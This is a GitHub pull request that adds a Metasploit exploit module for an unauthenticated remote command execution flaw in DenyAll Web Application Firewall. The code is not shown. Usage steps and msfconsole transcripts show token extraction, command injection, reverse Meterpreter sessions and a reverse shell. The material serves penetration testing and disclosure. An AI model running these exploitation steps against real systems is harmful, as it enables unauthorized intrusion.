New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding DenyAll Web Application Firewall RCE module #8980

Merged
merged 3 commits into from Sep 22, 2017

Conversation

Projects
None yet
4 participants
@mmetince
Contributor

mmetince commented Sep 19, 2017

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/denyall_waf_exec
  • Set RHOST
  • Set LHOST
  • Run check
  • Verify that you are seeing The target appears to be vulnerable.
  • Run exploit
  • Verify that you are seeing iToken value extraction.
  • Verify that you are getting meterpreter session.
msf > use exploit/linux/http/denyall_exec 
msf exploit(denyall_exec) > 
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit 

[*] Started reverse TCP handler on 35.12.3.3:4444 
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with  iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >

Here is the advisory and technical details about that vulnerability.
https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Sep 21, 2017

Contributor

if i get some time over the weekend (which is likely) I've got my eye on this.

Contributor

h00die commented Sep 21, 2017

if i get some time over the weekend (which is likely) I've got my eye on this.

Show outdated Hide outdated documentation/modules/exploit/linux/http/denyall_waf_exec.md Outdated
Show outdated Hide outdated documentation/modules/exploit/linux/http/denyall_waf_exec.md Outdated
You just need to follow instruction above URL.
## Verification Steps

This comment has been minimized.

@h00die
@h00die

h00die Sep 21, 2017

Contributor
## Verification Steps
A successful check of the exploit will look like this:

This comment has been minimized.

@h00die

h00die Sep 21, 2017

Contributor

Add the heading of ##Scenarios

@h00die

h00die Sep 21, 2017

Contributor

Add the heading of ##Scenarios

Show outdated Hide outdated modules/exploits/linux/http/denyall_waf_exec.rb Outdated
Show outdated Hide outdated modules/exploits/linux/http/denyall_waf_exec.rb Outdated
Show outdated Hide outdated modules/exploits/linux/http/denyall_waf_exec.rb Outdated
Show outdated Hide outdated modules/exploits/linux/http/denyall_waf_exec.rb Outdated
Show outdated Hide outdated modules/exploits/linux/http/denyall_waf_exec.rb Outdated
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128

This comment has been minimized.

@h00die

h00die Sep 21, 2017

Contributor

These look to be public IPs (unverified), you may want to change them to something else like 1.1.1.1 and 2.2.2.2

@h00die

h00die Sep 21, 2017

Contributor

These look to be public IPs (unverified), you may want to change them to something else like 1.1.1.1 and 2.2.2.2

This comment has been minimized.

@mmetince

mmetince Sep 21, 2017

Contributor

It was my AWS London instance IP that I've used for testing purpose. It's not alive anymore.

@mmetince

mmetince Sep 21, 2017

Contributor

It was my AWS London instance IP that I've used for testing purpose. It's not alive anymore.

@h00die

h00die approved these changes Sep 22, 2017

@h00die h00die self-assigned this Sep 22, 2017

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Sep 22, 2017

Contributor

Worked fine for me! I actually deployed 6.2.0.

msf > use exploit/linux/http/denyall_waf_exec 
msf exploit(denyall_waf_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(denyall_waf_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(denyall_waf_exec) > set reverselistenerbindaddress 3.3.3.3
reverselistenerbindaddress => 3.3.3.3
msf exploit(denyall_waf_exec) > set verbose true
verbose => true
msf exploit(denyall_waf_exec) > check
[*] 1.1.1.1:3001 The target appears to be vulnerable.
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:13926) at 2017-09-21 21:22:02 -0400
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:13784) at 2017-09-21 21:22:09 -0400

meterpreter > sysinfo
Computer        : ip-172-31-34-108
OS              : Linux 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.31.34.108 - Meterpreter session 2 closed.  Reason: User exit

Switched to a generic shell as well.

msf exploit(denyall_waf_exec) > set payload generic/shell_reverse_tcp 
payload => generic/shell_reverse_tcp
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Command shell session 3 opened (2.2.2.2:4444 -> 1.1.1.1:14236) at 2017-09-21 21:23:04 -0400
whoami
id

daactrl
uid=998(daactrl) gid=999(denyall) groups=999(denyall)
exit
Contributor

h00die commented Sep 22, 2017

Worked fine for me! I actually deployed 6.2.0.

msf > use exploit/linux/http/denyall_waf_exec 
msf exploit(denyall_waf_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(denyall_waf_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(denyall_waf_exec) > set reverselistenerbindaddress 3.3.3.3
reverselistenerbindaddress => 3.3.3.3
msf exploit(denyall_waf_exec) > set verbose true
verbose => true
msf exploit(denyall_waf_exec) > check
[*] 1.1.1.1:3001 The target appears to be vulnerable.
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:13926) at 2017-09-21 21:22:02 -0400
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:13784) at 2017-09-21 21:22:09 -0400

meterpreter > sysinfo
Computer        : ip-172-31-34-108
OS              : Linux 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.31.34.108 - Meterpreter session 2 closed.  Reason: User exit

Switched to a generic shell as well.

msf exploit(denyall_waf_exec) > set payload generic/shell_reverse_tcp 
payload => generic/shell_reverse_tcp
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Command shell session 3 opened (2.2.2.2:4444 -> 1.1.1.1:14236) at 2017-09-21 21:23:04 -0400
whoami
id

daactrl
uid=998(daactrl) gid=999(denyall) groups=999(denyall)
exit
@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Sep 22, 2017

Contributor

A few minor edits on the docs still left to do and i'll get this landed!

Contributor

h00die commented Sep 22, 2017

A few minor edits on the docs still left to do and i'll get this landed!

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Sep 22, 2017

Contributor

i take it back, landing now.

Contributor

h00die commented Sep 22, 2017

i take it back, landing now.

@h00die h00die merged commit 3d543b7 into rapid7:master Sep 22, 2017

1 check failed

continuous-integration/travis-ci/pr The Travis CI build failed
Details

h00die added a commit that referenced this pull request Sep 22, 2017

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Sep 22, 2017

Contributor

Release Notes

The DenyAll Web Application Firewall Remote Code Execution module has been added to the framework. It targets versions 6.3.0 and 6.2.0.

Contributor

h00die commented Sep 22, 2017

Release Notes

The DenyAll Web Application Firewall Remote Code Execution module has been added to the framework. It targets versions 6.3.0 and 6.2.0.

@h00die

This comment has been minimized.

Show comment
Hide comment
@h00die

h00die Sep 22, 2017

Contributor

Thanks for the contribution, looked pretty good from the start, and thanks for being so responsive!

Contributor

h00die commented Sep 22, 2017

Thanks for the contribution, looked pretty good from the start, and thanks for being so responsive!

@tdoan-r7 tdoan-r7 added the rn-exploit label Sep 27, 2017

@mmetince mmetince referenced this pull request Oct 23, 2017

Merged

Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143) #9114

7 of 7 tasks complete
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment